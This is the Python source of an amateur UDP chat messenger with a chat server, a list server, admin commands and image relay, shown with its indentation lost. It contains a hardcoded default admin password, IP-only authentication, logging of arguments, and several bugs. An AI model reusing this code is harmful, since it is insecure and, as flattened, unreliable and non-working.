# Server
def server(list_server_ip = '', list_server_port = '4244', server_name = '', server_port = '4242', listtheserver = False, ch_log = '', l_file = '', epw = False, pw ='', apw = 'jf/eu§nf(7UF+3ef5#]534*', ecl = True):
if l_file == '':
l_file = os.path.dirname(os.path.realpath(__file__))+'\\server_log.txt'
if not 'Windows' in platform.system():
l_file = os.path.dirname(os.path.realpath(__file__))+'/server_log.txt'
if ch_log == '':
ch_log = os.path.dirname(os.path.realpath(__file__))+'\\messenger_chat_log.txt'
if not 'Windows' in platform.system():
ch_log = os.path.dirname(os.path.realpath(__file__))+'/messenger_chat_log.txt'
log('\n\nlog from '+"--"+datetime.datetime.now().strftime("%Y/%m/%d %H:%M:%S")+"--\n", l_file, False)
log('---------------------------------------------', l_file)
log(' JuNi\'s Messenger Server', l_file)
log(' By JuNi, GitHub: https://github.com/juni4', l_file)
log('---------------------------------------------', l_file)
time.sleep(0.1)
log("["+datetime.datetime.now().strftime("%H:%M:%S")+"] Starting server...", l_file)
dev = False
log("["+datetime.datetime.now().strftime("%H:%M:%S")+"] Debugmode "+str(dev), l_file)
arg = sys.argv
log("["+datetime.datetime.now().strftime("%H:%M:%S")+"] Arguments givin: "+str(arg), l_file)
log("["+datetime.datetime.now().strftime("%H:%M:%S")+"] Setting PORT", l_file)
PORT = int(server_port)
# list server interaction
#if '-lsip' in arg:
# lsip = arg[arg.index('-lsip')+1]
# "" == INADDR_ANY
SERVER = ""
# List server stuff
log("["+datetime.datetime.now().strftime("%H:%M:%S")+"] Server NAME: "+server_name, l_file)
log("["+datetime.datetime.now().strftime("%H:%M:%S")+"] Server Pssword: "+str(epw), l_file)
log("["+datetime.datetime.now().strftime("%H:%M:%S")+"] Server listing: "+str(listtheserver), l_file)
if not list_server_ip == '':
log("["+datetime.datetime.now().strftime("%H:%M:%S")+"] List Server IP: "+list_server_ip, l_file)
if not list_server_port == '':
log("["+datetime.datetime.now().strftime("%H:%M:%S")+"] List Server Port: "+list_server_port, l_file)
if bool(listtheserver):
lspd = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
try:
lspd.connect((list_server_ip, int(list_server_port)))
lspd.close()
log("["+datetime.datetime.now().strftime("%H:%M:%S")+"] Getting PC IP.", l_file)
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.connect(("8.8.8.8", 80))
cserver_ip = s.getsockname()[0]
s.close()
log("["+datetime.datetime.now().strftime("%H:%M:%S")+"] Rigistering Server on List Server as "+server_name+".", l_file)
try:
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock.sendto(bytes('list_register '+cserver_ip+' '+str(PORT)+' '+server_name+' '+str(epw)+' 0','utf-8'), (list_server_ip, int(list_server_port)))
sock.close()
log("["+datetime.datetime.now().strftime("%H:%M:%S")+"] Server Registered.", l_file)
except:
log("["+datetime.datetime.now().strftime("%H:%M:%S")+"] Register Error. Maybe the server is offline?", l_file)
except:
log("["+datetime.datetime.now().strftime("%H:%M:%S")+"] The Listserver is not available.", l_file)
listtheserver = False
lspd.close()
log("["+datetime.datetime.now().strftime("%H:%M:%S")+"] Setting up usr vars", l_file)
# USR Specific vars for holding USR data
usr = []
usrn= []
usraddr = []
auth = []
admin_auth = []
timeout = []
log("["+datetime.datetime.now().strftime("%H:%M:%S")+"] Setting up Waitlist vars", l_file)
# Waitlist var
waitlistn = []
waitlistip = []
log("["+datetime.datetime.now().strftime("%H:%M:%S")+"] Setting up usr vars complete: usr, usrn, usraddr, auth, adminauth, waitlistn, waitlistip, timeout", l_file)
log("["+datetime.datetime.now().strftime("%H:%M:%S")+"] Creating UDP Socket", l_file)
# Create a UDP socket
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
log("["+datetime.datetime.now().strftime("%H:%M:%S")+"] Binding socket to PORT", l_file)
# Bind the socket to the port
server_address = (SERVER, PORT)
#log('starting up on {} port {}'.format(*server_address))
sock.bind(server_address)
log("["+datetime.datetime.now().strftime("%H:%M:%S")+"] Server opened on port: "+ str(PORT), l_file)
log("["+datetime.datetime.now().strftime("%H:%M:%S")+"] Creating server functions", l_file)
log("["+datetime.datetime.now().strftime("%H:%M:%S")+"] Creating kick function", l_file)
def kick(tusr, msg, did, kickindex = '_nonself'):
# get usr index in usr list
if not tusr in usrn:
print('['+datetime.datetime.now().strftime("%H:%M:%S")+'] USR '+did+' tried to kick a person who isn\'t in this room')
sock.sendto(bytes('Sorry but this Person in\'t in this room','utf-8'), (addr[0],4243))
return
usrindex = usrn.index(tusr)
# log message that usr xy left
log('['+datetime.datetime.now().strftime("%H:%M:%S")+'] User with IP '+addr[0]+' and Name '+usrn[usr.index(addr[0])]+' got kicked by '+did+' reason: '+msg+'.', l_file)
if ecl:
log(usrn[usrn.index(tusr)]+" left the room.",ch_log, False)
# send all usrs leave message
for o in usr:
if usrn[usr.index(o)] == usrn[usrn.index(tusr)]:
# if its the person who want's to leave, send the cs a exit message
sock.sendto(bytes("!leave_account_requested_by_self "+kickindex+" __msg:"+msg, encoding='utf-8'), (usraddr[usrn.index(tusr)][0],4243))
else:
if o in admin_auth:
sock.sendto(bytes(usrn[usrn.index(tusr)]+" got kicked by "+did+'.', encoding='utf-8'), (usraddr[usr.index(o)][0],4243))
else:
# else send leave message
sock.sendto(bytes(usrn[usrn.index(tusr)]+" left the room.", encoding='utf-8'), (usraddr[usr.index(o)][0],4243))
if dev:
# debug mesage
log('Send leave message to User Ip: '+o+' Name='+usrn[usr.index(o)])
# remove usr from auth list
if epw:
auth.pop(int(usrindex))
# remove usr from admin list
if usr[usrindex] in admin_auth:
admin_auth.pop(usrindex)
# remove usr from usr lists
usr.pop(int(usrindex))
usrn.pop(int(usrindex))
usraddr.pop(int(usrindex))
log("["+datetime.datetime.now().strftime("%H:%M:%S")+"] Creating is_usrn_taken function", l_file)
def is_usrn_taken(tusrn):
log("["+datetime.datetime.now().strftime("%H:%M:%S")+"] Checking if usrname is already taken", l_file)
x = True
c = 1
tuser2 = tusrn
while x and c < 100:
if tuser2 in usrn:
if tuser2 == tusrn:
tuser2 == tusrn + str(c)
else:
tuser2 = tuser2[:len(tuser2)-1]+str(c)
else:
if tuser2 == tusrn:
tuser2 == tusrn
log("["+datetime.datetime.now().strftime("%H:%M:%S")+"] Usrname "+tuser2+" wasn\'t taken", l_file)
else:
log("["+datetime.datetime.now().strftime("%H:%M:%S")+"] Usrname was taken and is now "+tuser2, l_file)
x = False
c += 1
return tuser2
log("["+datetime.datetime.now().strftime("%H:%M:%S")+"] Done!", l_file)
log("["+datetime.datetime.now().strftime("%H:%M:%S")+"] Awaiting Input...", l_file)
while True:
try:
data, address = sock.recvfrom(4096)
addr = address
msg = data.decode()
except Exception as exp:
log("["+datetime.datetime.now().strftime("%H:%M:%S")+"] An Error Acurred: "+str(exp), l_file)
addr = ["0", 0]
msg = ""
#log(str(addr)+': '+data.decode(), "'", sep="")
# Join server
if msg[0:5] == '/join':
log("["+datetime.datetime.now().strftime("%H:%M:%S")+"] Join Message by IP: "+addr[0]+" is trying to join.", l_file)
# If user is permitted to join...
if addr[0] in auth or epw == False:
# ..and not already connected...
if not addr[0] in usr:
log("["+datetime.datetime.now().strftime("%H:%M:%S")+"] Usr is allowed to Join and will join", l_file)
log("["+datetime.datetime.now().strftime("%H:%M:%S")+"] Adding usr to usr lists", l_file)
# ..let USR join
# set name of usr
name = is_usrn_taken(msg[6:len(msg)])
# add usr values to joined list
usr.append(str(addr[0]))
usrn.append(name)
usraddr.append(addr)
# tell other users that a new usr joined
log('['+datetime.datetime.now().strftime("%H:%M:%S")+'] New USER IP: '+str(addr[0])+' Name: '+name, l_file)
# Send chat log
if ecl:
# Read chatlog file
log("["+datetime.datetime.now().strftime("%H:%M:%S")+"] Reading Chat log", l_file)
clog = open(ch_log, 'r')
chlog_ar = []
for line in clog:
chlog_ar.append(line.rstrip())
clog.close()
#if not len(chlog_ar) == 0:
# chlog_ar.pop(len(chlog_ar)-1)
log('['+datetime.datetime.now().strftime("%H:%M:%S")+'] Sending Chat log to '+usrn[usr.index(addr[0])], l_file)
for o in chlog_ar:
sock.sendto(bytes(o,'utf-8'), (addr[0],4243))
if dev:
log('Sending chat log to '+usrn[usr.index(addr[0])])
# Join message
for o in usr:
sock.sendto(bytes(usrn[usr.index(addr[0])]+" joined the room.", encoding='utf-8'), (usraddr[usr.index(o)][0],4243))
if ecl:
log(usrn[usr.index(addr[0])]+" joined the room.",ch_log, False)
#log(,ch_log, False)
if dev:
log('Send join message to User Ip: '+o+' Name='+usrn[usr.index(o)], l_file)
else:
log('['+datetime.datetime.now().strftime("%H:%M:%S")+'] IP: '+addr[0]+' tried to login with a second account.', l_file)
else:
log("["+datetime.datetime.now().strftime("%H:%M:%S")+"] USR was not authed so usr will be added to waitlist", l_file)
name = msg[6:len(msg)]
waitlistn.append(name)
waitlistip.append(addr[0])
# Auth on Server
elif msg[0:5] == '/auth' and epw:
log('['+datetime.datetime.now().strftime("%H:%M:%S")+'] Recived auth command from IP: '+addr[0], l_file)
if msg[6:len(msg)] == pw and not addr[0] in auth:
auth.append(addr[0])
if not addr[0] in usr and addr[0] in waitlistip:
# ..let USR join
# set name of usr
name = is_usrn_taken(waitlistn[waitlistip.index(addr[0])])
# add usr values to joined list
usr.append(str(addr[0]))
usrn.append(name)
usraddr.append(addr)
# tell other users that a new usr joined
log('['+datetime.datetime.now().strftime("%H:%M:%S")+'] New USER IP: '+str(addr[0])+' Name: '+name, l_file)
for o in usr:
sock.sendto(bytes(usrn[usr.index(addr[0])]+" joined the room.", encoding='utf-8'), (usraddr[usr.index(o)][0],4243))
#log(,ch_log, False)
if dev:
log('Send join message to User Ip: '+o+' Name='+usrn[usr.index(o)])
if ecl:
log(usrn[usr.index(addr[0])]+" joined the room.",ch_log, False)
# Send chat log
if ecl:
log('['+datetime.datetime.now().strftime("%H:%M:%S")+'] Sending Chat log to '+usrn[usr.index(addr[0])], l_file)
# Read chatlog file
clog = open(ch_log, 'r')
chlog_ar = []
for line in clog:
chlog_ar.append(line.rstrip())
clog.close()
#if not len(chlog_ar) == 0:
# chlog_ar.pop(len(chlog_ar)-1)
for o in chlog_ar:
sock.sendto(bytes(o,'utf-8'), (addr[0],4243))
try:
waitlistip.pop(waitlistip.index(addr[0]))
waitlistn.pop(waitlistip.index(addr[0]))
except Exception as e:
print(e)
print(waitlistip,waitlistn)
# Admin auth on Server
elif msg[0:6] == '/aauth' and addr[0] in usr:
if msg[7:len(msg)] == apw and not addr[0] in admin_auth:
log('['+datetime.datetime.now().strftime("%H:%M:%S")+'] USER IP: '+str(addr[0])+' Name: '+usrn[usr.index(addr[0])]+' became mod.', l_file)
admin_auth.append(addr[0])
for o in admin_auth:
sock.sendto(bytes(usrn[usr.index(addr[0])]+" became mod.", encoding='utf-8'), (usraddr[usr.index(o)][0],4243))
if dev:
log('Send mod message to User Ip: '+o+' Name='+usrn[usr.index(o)],l_file)
else:
sock.sendto(bytes('Sorry, but the Password is incorrect', 'utf-8'), (addr[0],4243))
log('['+datetime.datetime.now().strftime("%H:%M:%S")+'] USER IP: '+str(addr[0])+' Name: '+usrn[usr.index(addr[0])]+' tried to become mod with an incorrect password.', l_file)
# /leave command
elif msg[0:6] == '/leave':
# get usr index in usr list
usrindex = usr.index(addr[0])
# log message that usr xy left
log('['+datetime.datetime.now().strftime("%H:%M:%S")+'] User with IP '+addr[0]+' and Name '+usrn[usr.index(addr[0])]+' left.', l_file)
if ecl:
log(usrn[usr.index(addr[0])]+" left the room.",ch_log, False)
# send all usrs leave message
for o in usr:
if o == addr[0]:
# if its the person who want's to leave, send the cs a exit message
sock.sendto(bytes("!leave_account_requested_by_self", encoding='utf-8'), (usraddr[usr.index(o)][0],4243))
else:
# else send leave message
sock.sendto(bytes(usrn[usr.index(addr[0])]+" left the room.", encoding='utf-8'), (usraddr[usr.index(o)][0],4243))
if dev:
# debug mesage
log('Send leave message to User Ip: '+o+' Name='+usrn[usr.index(o)])
if epw:
auth.pop(int(usrindex))
# remove usr from admin list
if addr[0] in admin_auth:
admin_auth.pop(usrindex)
# remove usr from usr lists
usr.pop(int(usrindex))
usrn.pop(int(usrindex))
usraddr.pop(int(usrindex))
# remove usr from auth list
if addr[0] in auth:
auth.pop(usrindex)
# list command
elif msg[0:5] == '/list':
user_list = ''
c = 0
for o in usrn:
if user_list == '':
user_list = user_list +'' + usrn[c]
else:
user_list = user_list +', ' + usrn[c]
c += 1
if len(usr) == 1:
lmsg ="There is "+str(len(usr))+" person in the room: "+user_list
else:
lmsg = lmsg ="There are "+str(len(usr))+" persons in the room: "+user_list
log("["+datetime.datetime.now().strftime("%H:%M:%S")+"] [Server] "+lmsg, l_file)
if ecl:
log(lmsg,ch_log, False)
for o in usr:
sock.sendto(bytes(lmsg, encoding='utf-8'), (usraddr[usr.index(o)][0],4243))
if dev:
log('Send userlist to User Ip: '+o+' Name='+usrn[usr.index(o)])
elif msg[0:4] == '/img' and addr[0] in usr:
log("["+datetime.datetime.now().strftime("%H:%M:%S")+"] Recived Image from USR: "+usrn[usr.index(addr[0])], l_file)
rcvstr = msg[5:]+','
# Recive every part part of the image
while not '}' in list(rcvstr):
data, address = sock.recvfrom(4096)
#print(data.decode())
#log("["+datetime.datetime.now().strftime("%H:%M:%S")+"] Reciving... "+data.decode(), l_file)
if address[0] == addr[0]:
#log("["+datetime.datetime.now().strftime("%H:%M:%S")+"] Reciving Imagedata: "+data.decode().replace(' ','').replace('\n',''), l_file)
if not '}' in list(data.decode()):
rcvstr += data.decode()+','
else:
dat = data.decode()[:data.decode().index('}')+1]
rcvstr += dat
# Print Json Image data
#print(rcvstr.replace('\n','').replace(' ', ''))
# Load text to json
#f = open("json.json",'w')
#f.write(rcvstr)
#f.close()
ij = json.loads(rcvstr)
name = ij["name"]
if "rick__roll" in name:
for o in usr:
sock.sendto(bytes('!secure_corckrl','utf-8'),(o,4243))
w = int(ij["w"])
h = int(ij["h"])
w2 = w
h2 = h
sc = 1
# shrink image down if needed
while w2 > 38 or h2 > 38:
sc += 1
w2 = int(w/sc)
h2 = int(h/sc)
# get calculated shrink values and shrink
sendji = itj.manage_json(1,sc,rcvstr)
# display
log("["+datetime.datetime.now().strftime("%H:%M:%S")+"] Image '"+ij["name"]+"':", l_file)
if not '-disIMG' in sys.argv:
itj.json_to_text(1,sc,sendji)
else:
print(" [IMAGE HIDDEN BECAUSE -disIMG IN ARGUMENTS]")
sendspl = sendji.split(',')
# Send first Part of message
log("["+datetime.datetime.now().strftime("%H:%M:%S")+"] Sending image to usrs", l_file)
for i in range(0,10):
sendspl.append("")
for o in usr:
sock.sendto(bytes('!img '+sendspl[0], 'utf-8'),(o,4243))
time.sleep(0.001)
# Send rest of message
a = len(sendspl)
#print(str(a),str(int(a/10)*10),str(int(a/10)*10 < a))
for i in range(0,int((a)/10)+1):
#print(len(sendspl)-1,i*10+10,int((a)/10))
try:
x = (sendspl[i*10+1]+','+sendspl[i*10+2]+','+sendspl[i*10+3]+','+sendspl[i*10+4]+','+sendspl[i*10+5]+','+sendspl[i*10+6]+','+sendspl[i*10+7]+','+sendspl[i*10+8]+','+sendspl[i*10+9]+','+sendspl[i*10+10]).replace(' ', '')
try:
x = x[:x.index('}')+1]
except:
pass
try:
x = x[:x.index(',,')]
except:
pass
sock.sendto(bytes(x,'utf-8'),(o,4243))
except Exception as e:
#print(e)
pass
time.sleep(0.01)
# Admin commands
elif msg[0:1] == '!':
cmdlist = ['help','chatlog_clear','chatlog_en','chatlog_dis','kick', 'stop', 'reasonkick', 'imp']
def ac(c,istr, ofs = 1, low = True):
if low:
istr = istr[ofs:len(c)+ofs].lower()
c = c.lower()
else:
istr = istr[ofs:len(c)+ofs]
if istr == c:
return True
else:
return False
if addr[0] in admin_auth:
if ac(cmdlist[0],msg, low = False):
hmsg = ' !help Shows this message\n !chatlog_clear Clears the chat log - the log wich is send to a user on join\n !chatlog_dis Diables the chat log and it will no longer be send to usrs on join\n !chatlog_en Enables the chatlog and all writen messages will be send to joining usrs\n !kick Kicks the Person (usrname)\n !stop Stoppes the Server.\n !imp Important message with toast for every usr'
sock.sendto(bytes(hmsg, encoding='utf-8'), (addr[0],4243))
if ac(cmdlist[1],msg):
f = open(ch_log, 'w')
f.write('')
f.close()
for o in admin_auth:
if o == addr[0]:
sock.sendto(bytes('You cleared the Chat Log'.format(addr[0]),'utf-8'), (o,4243))
else:
sock.sendto(bytes('User {0} cleared the Chat Log'.format(addr[0]),'utf-8'), (o,4243))
if ac(cmdlist[2],msg):
ecl = True
for o in admin_auth:
if o == addr[0]:
sock.sendto(bytes('You enabled the Chat Log'.format(addr[0]),'utf-8'), (o,4243))
else:
sock.sendto(bytes('User {0} enabled the Chat Log'.format(addr[0]),'utf-8'), (o,4243))
if ac(cmdlist[3],msg):
ecl = False
for o in admin_auth:
if o == addr[0]:
sock.sendto(bytes('You disabled the Chat Log'.format(addr[0]),'utf-8'), (o,4243))
else:
sock.sendto(bytes('User {0} disabled the Chat Log'.format(addr[0]),'utf-8'), (o,4243))
if ac(cmdlist[4],msg):
if not msg[6:len(msg)] in usrn:
print('['+datetime.datetime.now().strftime("%H:%M:%S")+'] USR '+did+' tried to kick a person who isn\'t in this room')
sock.sendto(bytes('Sorry but this Person in\'t in this room','utf-8'))
else:
# get usr index in usr list
usrindex = usrn.index(msg[6:len(msg)])
# log message that usr xy left
log('['+datetime.datetime.now().strftime("%H:%M:%S")+'] User with IP '+usr[usrindex]+' and Name '+usrn[usrindex]+' got kicked by '+usrn[usr.index(addr[0])]+'.', l_file)
if ecl:
log(usrn[usr.index(addr[0])]+" left the room.",ch_log, False)
# send all usrs leave message
for o in usr:
if usrn[usr.index(o)] == msg[6:len(msg)]:
# if its the person who want's to leave, send the cs a exit message
sock.sendto(bytes("!leave_account_requested_by_self _nonself", encoding='utf-8'), (o,4243))
else:
if o in admin_auth:
sock.sendto(bytes(usrn[usrn.index(msg[6:len(msg)])]+" got kicked by "+usrn[usr.index(addr[0])]+'.', encoding='utf-8'), (o,4243))
else:
# else send leave message
sock.sendto(bytes(usrn[usrn.index(msg[6:len(msg)])]+" left the room.", encoding='utf-8'), (o,4243))
if dev:
# debug mesage
log('Send leave message to User Ip: '+o+' Name='+usrn[usr.index(o)])
# remove usr from auth list
if epw:
auth.pop(int(usrindex))
# remove usr from admin list
if usr[usrindex] in admin_auth:
admin_auth.pop(usrindex)
# remove usr from usr lists
usr.pop(int(usrindex))
usrn.pop(int(usrindex))
usraddr.pop(int(usrindex))
# Stop command
if ac(cmdlist[5], msg):
for o in usr:
if not o in admin_auth[0]:
sock.sendto(bytes('Server Stopping'.format(addr[0]),'utf-8'), (o,4243))
else:
sock.sendto(bytes('User {0} Stopped the server'.format(usrn[usr.index(addr[0])]),'utf-8'), (o,4243))
for u in usr:
kick(u, 'Server Closed','SERVER_CLIENT_MANAGER', '_svclosed')
exit()
if ac(cmdlist[6], msg):
tmsg1 = msg.split(' ')
tmsg2 = tmsg1[0]+' '+tmsg1[1]+' '
reason = tmsg1[1]
tusr = msg[len(tmsg2):]
if not tusr in usrn:
print('['+datetime.datetime.now().strftime("%H:%M:%S")+'] USR '+usrn[usr.index(addr[0])]+' tried to kick a person who isn\'t in this room')
sock.sendto(bytes('Sorry but this Person in\'t in this room','utf-8'), (addr[0],4243))
else:
did = usrn[usr.index(addr[0])]
kick(tusr, reason, did)
if ac(cmdlist[7],msg):
log('['+datetime.datetime.now().strftime("%H:%M:%S")+'] Important Message: <'+usrn[usr.index(str(addr[0]))]+'> '+msg[1+len(cmdlist[7]+' '):], l_file)
retmsg = '<'+usrn[usr.index(str(addr[0]))]+'> '+msg[1+len(cmdlist[7]+' '):]
for o in usr:
if not o == addr[0]:
sock.sendto(bytes('!important_message '+retmsg, encoding='utf-8'), (usraddr[usr.index(o)][0],4243))
if ecl:
log(retmsg,ch_log, False)
if dev:
log('Send message to User Ip: '+o+' Name='+usrn[usr.index(o)], l_file)
else:
sock.sendto(bytes('Error: You are not permitted to do that!', encoding='utf-8'), (addr[0],4243))
log('['+datetime.datetime.now().strftime("%H:%M:%S")+'] Error: USR '+usrn[usr.index(addr[0])]+' tried to execute Admin Commands while not authed', l_file)
elif addr[0] == list_server_ip and msg == '_Still Active dude?':
time.sleep(0.1)
log('['+datetime.datetime.now().strftime("%H:%M:%S")+'] List Server Ping',l_file)
sock.sendto(bytes('list_update '+cserver_ip+' '+str(PORT)+' '+server_name+' '+str(epw)+' '+str(len(usr)),'utf-8'), (list_server_ip, int(list_server_port)))
elif addr[0] in usr and not msg == '':
if addr[0] in auth or epw == False:
log('['+datetime.datetime.now().strftime("%H:%M:%S")+'] <'+usrn[usr.index(str(addr[0]))]+'> '+msg, l_file)
retmsg = '<'+usrn[usr.index(str(addr[0]))]+'> '+msg
for o in usr:
if not o == addr[0]:
sock.sendto(bytes(retmsg, encoding='utf-8'), (usraddr[usr.index(o)][0],4243))
if ecl:
log(retmsg,ch_log, False)
if dev:
log('Send message to User Ip: '+o+' Name='+usrn[usr.index(o)], l_file)
if ecl:
log(retmsg, ch_log, False)
#strdata = data.decode()
#retmsg = '<'+usrn[usr.index(str(addr[0]))]+'> '+msg + strdata
#con.sendall(retmsg.encode())
# List Server
def list_servers_server(ip = '', PORT = '', log_file = ''):
dev = False
if log_file == '':
l_file = os.path.dirname(os.path.realpath(__file__))+'\\list_server_log.txt'
if not 'Windows' in platform.system():
l_file = os.path.dirname(os.path.realpath(__file__))+'/list_server_log.txt'
else:
l_file = log_file
log('\n\nlog from '+"--"+datetime.datetime.now().strftime("%Y/%m/%d %H:%M:%S")+"--\n", l_file, False)
log('---------------------------------------------', l_file)
log(' JuNi\'s Messenger List Server', l_file)
log(' By JuNi, GitHub: https://github.com/juni4', l_file)
log('---------------------------------------------', l_file)
time.sleep(0.1)
log("["+datetime.datetime.now().strftime("%H:%M:%S")+"] Starting server...", l_file)
dev = False
log("["+datetime.datetime.now().strftime("%H:%M:%S")+"] Debugmode "+str(dev), l_file)
log("["+datetime.datetime.now().strftime("%H:%M:%S")+"] Setting up server vars", l_file)
SERVER = ""
reg_servers_ip = []
reg_servers_p = []
reg_servers_name = []
reg_servers_epw = []
reg_servers_uc = []
log("["+datetime.datetime.now().strftime("%H:%M:%S")+"] Creating UDP Socket", l_file)
# Create a UDP socket
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
log("["+datetime.datetime.now().strftime("%H:%M:%S")+"] Binding socket to PORT", l_file)
# Bind the socket to the port
server_address = (SERVER, int(PORT))
#print('starting up on {} port {}'.format(*server_address))
sock.bind(server_address)
log("["+datetime.datetime.now().strftime("%H:%M:%S")+"] Server opened on port: "+ PORT, l_file)
log("["+datetime.datetime.now().strftime("%H:%M:%S")+"] Done!", l_file)
log("["+datetime.datetime.now().strftime("%H:%M:%S")+"] Awaiting Input...", l_file)
while True:
data, address = sock.recvfrom(4096)
addr = address
msg = data.decode()
#print(str(addr)+': '+data.decode(), "'", sep="")
# refresh server list
c = 0
for o in reg_servers_ip:
try:
sock.sendto(bytes('_Still Active dude?', encoding='utf-8'), (o,int(reg_servers_p[c])))
data2, address = sock.recvfrom(4096)
addr2 = address
msg2 = data2.decode()
larg = msg2.split(' ')
if larg[0] == 'list_update':
reg_servers_ip[c] = larg[1]
reg_servers_name[c] = larg[3]
reg_servers_p[c] = larg[2]
reg_servers_epw[c] = larg[4]
reg_servers_uc[c] = larg[5]
log("["+datetime.datetime.now().strftime("%H:%M:%S")+"] Server with Name "+reg_servers_name[c]+" and IP "+reg_servers_ip[c]+" is stil Active.", l_file)
else:
log("["+datetime.datetime.now().strftime("%H:%M:%S")+"] Server with Name "+reg_servers_name[c]+" and IP "+reg_servers_ip[c]+" is inactive and will be removed from Serverlist.", l_file)
reg_servers_ip.pop(c)
reg_servers_name.pop(c)
reg_servers_p.pop(c)
reg_servers_epw.pop(c)
reg_servers_uc.pop(c)
#lspd.connect((reg_servers_ip[c], int(reg_servers_p[c])))
except:
log("["+datetime.datetime.now().strftime("%H:%M:%S")+"] Server with Name "+reg_servers_name[c]+" and IP "+reg_servers_ip[c]+" is inactive and will be removed from Serverlist.", l_file)
reg_servers_ip.pop(c)
reg_servers_name.pop(c)
reg_servers_p.pop(c)
reg_servers_epw.pop(c)
reg_servers_uc.pop(c)
c += 0
log("["+datetime.datetime.now().strftime("%H:%M:%S")+"] Refreshed server list.", l_file)
if msg[0:13] == 'list_register':
larg = msg.split(' ')
#print(msg)
log("["+datetime.datetime.now().strftime("%H:%M:%S")+"] Added New Server, IP: "+larg[1]+' Port: '+larg[2]+' Name: '+larg[3]+'.', l_file)
reg_servers_ip.append(larg[1])
reg_servers_name.append(larg[3])
reg_servers_p.append(larg[2])
reg_servers_epw.append(larg[4])
reg_servers_uc.append(larg[5])
#print(reg_servers_ip,reg_servers_epw)
elif msg[0:5] == '/list':
sock.sendto(bytes('All known Servers:', encoding='utf-8'), (addr[0],4245))
sock.sendto(bytes(' Name: IP: Port: PW(Y/N): USR:', encoding='utf-8'), (addr[0],4245))
c = 0
for o in reg_servers_ip:
sn = 12-len(reg_servers_name[c])
sip =17-len(reg_servers_ip[c])
sp = 8-len(reg_servers_p)
sn2 = ' '*sn
sip2= ' '*sip
if reg_servers_epw[c] == 'True':
pwq = 'Y'
else:
pwq = 'N'
sock.sendto(bytes(' '+reg_servers_name[c]+sn2+reg_servers_ip[c]+sip2+reg_servers_p[c]+' '*sp+pwq+' '*10+reg_servers_uc[c], encoding='utf-8'), (addr[0],4245))
c += 1
sock.sendto(bytes('!system_message:end', encoding='utf-8'), (addr[0],4245))
if dev:
log("["+datetime.datetime.now().strftime("%H:%M:%S")+'] Send serverlist to User Ip: '+o+' Name='+addr[0], l_file)
elif msg[0:5] == '/join':
sock.sendto(bytes("!leave_account_requested_by_self", encoding='utf-8'), (addr[0],4243))
# log and print
def log(log_string, log_file, o = True):
if o:
print(log_string)
f = open(log_file, 'a')
f.write(log_string+'\n')
f.close()
# get -xyz arg in sys.argv
def getarg(arg, alt):
if not arg == '':
if arg in sys.argv:
return sys.argv[sys.argv.index(arg)+1]
else: return alt
arg = sys.argv
# launch correct 'apllication'
if len(arg) > 1:
# Server launcher
if '-s' in arg or '-server' in arg[1] or arg[1] == ' server ':
# help
if '-h' in arg:
print('HELP: \n -h Help\n -name Server Name\n -p Server Port\n -lsip IP of List Server\n -lsp Port of List Server\n -els Enable the list server\n -pw Password for Server\n -apw To set the Admin Password\n -disIMG To Disable Images being displayed')
exit()
if '-els' in arg:
els = True
else:
els = False
if '-pw' in arg:
epw = True
else:
epw = False
if '-ecl' in arg:
ecl = True
else:
ecl = False
server(list_server_ip=getarg('-lsip', 'localhost'), list_server_port=getarg('-lsp', '4244'), server_name=getarg('-name', ''), server_port=getarg('-p', '4242'), listtheserver=els, l_file=getarg('-lf', ''), ch_log=getarg('-cl', ''), ecl=ecl, apw=getarg('-apw','jf/eu§nf(7UF+3ef5#]534*'), epw = epw, pw = getarg('-pw', ''))
# Client launcher
if '-c' in arg or '-client' in arg[1] or arg[1] == ' client ':
client()
# List Server launcher
if '-ls' in arg or '-listserver' in arg or arg[1] == ' listserver ':
list_servers_server(PORT = getarg('-p', '4244'), log_file=getarg('-lf', ''))
# Client Server Launcher - For Split Sending & Reciveving messages
if '-cs' in arg or '-clientserver' in arg or arg[1] == ' clientserver ':
client_server()
# list servers from list server
if 'list' in arg:
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock.sendto(bytes("/list", encoding='utf-8'), (getarg('-ip', 'localhost'),int(getarg('-p', '4244'))))
sock.close()
# ip and port for list server
SERVER = ""
PORT = 4245
# Puffergroesse fuer recv()
BUF_SIZE = 1024
# Dies ist der Server.
# Server-Port oeffnen
#sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
server_address = (SERVER, int(PORT))
# Server an den Port binden
x = True
sock.bind(server_address)
while x:
data, server = sock.recvfrom(4096)
if data.decode() == '!system_message:end':
x = False
else:
print(data.decode())
exit()
#print("["+datetime.datetime.now().strftime("%H:%M:%S")+"] LOL.")
#input()
#log("["+datetime.datetime.now().strftime("%H:%M:%S")+"] .", l_file)
# If you do not enter any extra details an "UI" will apper to input any data
class smenu():
def styl_menu_vert(name='ExampleMenu',prompt='Pleae select one of the following:' , entrys=['Entry 1','Entry 2','Entry 3'],description=['The Entry 1 of the menu. Press ENTER to select it','Lorem Ipsulm','LOL'],backcolor = '\033[44m',menucolor= '\033[47m',selcolor = '\033[100m', sup = False):
namel = len(name)
namelengh = 44-namel
promptl = 43-len(prompt)
done = False
sel = 0
#Colors
tres = '\033[39m'
tblack = '\033[30m'
#lcol = rgb(80,80,80)
lcol = ''
while done == False:
if sel > len(entrys)-1:
sel = len(entrys)-1
if sel < 0:
sel = 0
print(backcolor+' '*50+'\033[49m')
print(backcolor+' '*2+menucolor+lcol+'┌'+'─'*44+'┐'+tres+backcolor+' '*2+'\033[49m')
print(backcolor+' '*2+menucolor+lcol+'│'+tblack+name+'\033[39m'+' '*namelengh+lcol+'│'+tres+backcolor+' '*2+'\033[49m')
print(backcolor+' '*2+menucolor+lcol+'├'+'─'*44+'┤'+tres+backcolor+' '*2+'\033[49m')
print(backcolor+' '*2+menucolor+lcol+'│'+tblack+' '+prompt+'\033[39m'+' '*promptl+lcol+'│'+tres+backcolor+' '*2+'\033[49m')
c = 0
for object in entrys:
entry = entrys[c]
entryl = 42-len(entry)
if sel == c:
print(backcolor+' '*2+menucolor+lcol+'│'+' '+selcolor+tblack+entry+tres+menucolor+' '*entryl+lcol+'│'+tres+backcolor+' '*2+'\033[49m')
else:
